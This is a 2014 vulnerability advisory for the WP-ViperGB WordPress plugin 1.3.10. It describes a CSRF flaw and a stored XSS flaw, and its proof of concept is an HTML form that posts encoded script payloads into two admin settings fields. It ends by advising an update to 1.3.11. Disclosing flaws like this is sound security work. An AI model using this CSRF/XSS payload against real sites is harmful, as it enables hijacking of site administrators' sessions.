Title: WordPress 'WP-ViperGB' plugin - CSRF/XSS
Version: 1.3.10
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/wp-vipergb/
Notified WordPress: 2014/11/27
----------------------------------------------------------------

## Description: 
----------------------------------------------------------------
WP-ViperGB is a WordPress plugin designed to replicate the appearance and behavior of the discontinued Viper Guestbook project. It makes it easy to add a stylish and user-friendly guestbook to your blog.

## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. 


## Stored XSS:
----------------------------------------------------------------
Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. 


PoC:
Log in as admin to the vulnerable site and press the submit button on this form:

<form method="POST" action="http://vuln.site/wp-admin/options-general.php?page=wp-vipergb"> 
   <input type="text" name="vgb_page" value="0&#x22;/&#x3E;&#x3C;script&#x3E;alert(1);&#x3C;/script&#x3E;"><br />
  <input type="text" name="vgb_style" value="Default"><br />
  <input type="text" name="vgb_items_per_pg" value="100&#x22;/&#x3E;&#x3C;script&#x3E;alert(2);&#x3C;/script&#x3E;"><br />
  <input type="text" name="vgb_show_browsers" value="1"><br />  
  <input type="text" name="vgb_show_flags" value="1"><br />
  <input type="text" name="opts_updated" value="1"><br />
  <input type="text" name="Submit" value="Save"><br />
  <input type="submit">
</form>


## Solution
----------------------------------------------------------------
Update to version 1.3.11